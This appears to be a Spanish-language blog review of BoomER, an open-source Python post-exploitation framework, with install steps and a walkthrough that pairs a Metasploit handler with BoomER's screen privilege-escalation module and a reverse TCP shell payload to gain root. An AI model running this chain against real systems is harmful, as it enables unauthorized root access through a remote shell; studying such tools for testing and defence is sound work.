BoomER – Una herramienta de código abierto para explotar vulnerabilidades

BoomER es un framework de código abierto de Python con interfaz de línea de comandos completamente desarrollado en Python 3.X, para la explotación posterior de objetivos.

Este tiene el objetivo de explotar vulnerabilidades locales en los tres grandes sistemas operativos (Windows / Linux / Mac). La herramienta permite la interacción con software de terceros como Metasploit para encadenar ataques juntos.

Instalación

1. Dirígete al repositorio de Github

2. git clone https://github.com/Josue87/BoomER

3. cd BoomER

4. Los requisitos de instalación dependen del sistema operativo de tu computadora. Ya que estoy usando Kali lo haré con sudo pip3 install -r linuxrequirements.txt

Uso

Para explicar el uso de BoomER en este ejemplo, usamos Metasploit e intentamos realizar un ataque de explotación local en Kali usando privilegios de usuario normales

1. Ejecutamos Metasploit con el comando msfconsole o msfdb run

2. Escribimos use exploit/multi/handler

3. set LHOSt {tuip}

4. set LPORT {tupuerto}

 

5. Ejecutamos BoomER con el comando python3 boomer.py

6. Cargando El módulo Linux y el payload

load linux/elevation/screen_exploit

put payload msf/linux/x64/shell_reverse_tcp

7. Configuramos en BoomER el mismo LHOST y LPORT que configuramos en Metasploit

put lhost {tuip}

put lport {tupuerto}

8. Ejecutamos exploit -j -z en Metasploit y run en BoomER

9. Finalmente obtenemos nuestra Shell root

Ventajas 

  • Totalmente personalizado
  • Sintaxis fácil (similar a MSF)

Desventajas

  • MSF ya tiene módulos locales
  • No está en desarrollo activo

Creo que BoomER es una herramienta poderosa con una sintaxis similar a Metasploit y funciona para explotar las vulnerabilidades locales, implementan muchos módulos que funcionan en todo tipo de sistemas operativos.

Le otorgamos 6 de 10 puntos posibles.

Deja un comentario